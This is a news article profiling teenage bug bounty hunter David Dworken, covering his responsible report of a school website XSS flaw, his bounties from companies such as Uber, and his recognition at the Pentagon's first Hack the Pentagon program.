- June 22, 2016
- Posted by: Kerry Tomlinson, Archer News
- Category: Data Breach, Hacking
One of the kids who may save your digital future just graduated from high school & landed at the Pentagon for a hacker tribute.
His first hack was a calculator. In middle school, someone told David Dworken he could program the TI-83+ he was using in class. Not long after, he turned the calculator into a game of Pong.
“I do remember my math teacher giving me one of the manuals for the calculators and being unbelievably excited to read it,” Dworken said. “When our teachers gave us time to read whatever we wanted, I read the calculator manual.”
Now 18, Dworken is one of the new superheroes of Generation Z, a hacker for good who will help protect your safety in your connected home, car and world. He went from high school graduation last week to the Pentagon, receiving a nod from Secretary of Defense Ash Carter in a live briefing on the first-ever Hack the Pentagon bug bounty program.
Read more: “What’s it’s like to actually hack the Pentagon.”
He hopes other teens will join him in the battle to defend from malicious attacks.
“I would absolutely recommend that people my age get into cybersecurity,” Dworken told Archer News. “In my opinion, the world of cybersecurity needs more people,” he added. “Just looking around the news, I always am reading about how company X was hacked or company Y’s data was leaked, and I believe that bug bounty programs can help put a stop to this.”
Bug fever started for Dworken in tenth grade. In Advanced Computer Science class at Maret School in Washington, D.C., he and another student found a security hole—a bug in the password reset form on the school’s site.
“Throughout that year’s class our teacher always reminded us that our programs should be able to properly handle invalid input,” he explained. “So a friend and I were looking at our school’s website to see whether or not it did.”
They tested it, and “noticed bizarre output from it.” It was a vulnerability called XSS, or cross-site scripting, which can allow an attacker to change a website and steal data.
“When we showed this to our computer science teacher, he walked us through sending a report to the website developers so it could be fixed,” Dworken said. “This really got me interested in cybersecurity and from there the interest blossomed. The experience was absolutely exhilarating and seeing it fixed was almost as satisfying as finding it.”
Why turn it in, instead of using it to wreak havoc on the school, as some malicious hackers or unscrupulous students might?
“Fundamentally, I just believe that it is the right thing to do—and this is what drives all of the cybersecurity work I do,” said Dworken. “Exploiting it would have caused a lot of problems for a lot of people, so morally it just isn’t right.”
First bug bounty
After the school site discovery, he taught himself more about cybersecurity, and then started trying bug bounty programs, where organizations offer rewards to hackers who ferret out security gaps in their sites and programs.
He began with organizations that promised no money but instead a spot on their list of successful vulnerability researchers.
“At first, I was mostly focusing on programs that offered ‘hall of fames’—since people generally paid less attention to them, so it was easier,” Dworken said. “From there I started to work on ones that offered free swag—T-shirts, generally.”
Soon, he was ready to try a money contest. He spent time on the sites of Bugcrowd and HackerOne, both bug bounty program organizations, and earned about $100 every few weeks.
Just months from graduation, his bug-finding skills produced big results.
“Just earlier this year, I became very successful while participating in Uber’s bug bounty program,” he said. “From four vulnerabilities I reported, I received almost $8,000 in bounties!”
The list of organizations he has helped by finding bugs includes Western Union, Amazon, eBay, Netflix, MailChimp, Adobe, AT&T, Tumblr, GoDaddy, IBM and many other companies, according to his resume and web site–all this while going through his senior year in high school, serving as captain of the school’s engineering team, building robots and taking Advanced Placement classes to earn college credit.
Hack the Pentagon
Dworken first heard about the new Hack the Pentagon program on NPR in March.
“Even at that point, I immediately knew that I wanted to participate in the program, since it so clearly contributed to the greater good,” he said.
The race to find the Department of Defense bugs launched on April 18—just as his senior year schoolwork intensified.
“Time was definitely at a premium for me in that time period since it AP [Advanced Placement] exams were coming up,” he said.
But he did not give up, instead working it in during free period at school, before class, or between homework assignments, logging a total of 10 to 15 hours testing Pentagon cyber defenses.
“Ultimately, this meant I didn’t spend as much time on it as I would have liked, so I’m very excited for future bug bounties coming from the government,” Dworken said.
The rewards for Dworken from the Pentagon’s first bug bounty program are not monetary.
“Some of the first vulnerabilities I found, I found relatively quickly using a set of custom programs for scanning for common web vulnerabilities. So those are the ones I reported within the first day of the program,” Dworken said. “After that, it was mostly manual searching for vulnerabilities which is much more time-consuming.”
He was one of the 252 people who submitted bug reports in the contest, but not one of the 117 who got paid. He reported six vulnerabilities, but all turned out to be duplicates of other researchers’ work. Others split a total of $71,200 in prizes.
Dworken, however, was one of two hackers selected to stand to the right of Carter during the live briefing from the Pentagon last week. He smiled broadly during the briefing, and received a handshake and a challenge coin from Carter in thanks.
“In terms of lessons learned, I was unbelievably impressed with the Pentagon and the government as a whole for the creation of this program,” Dworken said. “The willingness and eagerness to follow industry best practices in the creation of a bug bounty program is amazing, and I hope that it will expand to more and more of the government.”
The Pentagon has indeed promised more bug bounties and expanded resources for white hat hackers in the months to come. Still, there are hundreds of thousands cybersecurity jobs in the U.S. government and worldwide that may go unfilled if young people do not take on the challenge of learning cybersecurity.
Dworken is willing to try to help his peers.
“Well, I would try to convince them that it isn’t boring—e.g., show them an XSS on a website displaying their name. And if that isn’t enough to convince them, then I would frankly leave it at that,” he said. “I think one of the most important things in cybersecurity is truly being passionate about it,” Dworken added. “It is the passion for the topic that justifies spending free time working on bug bounties.”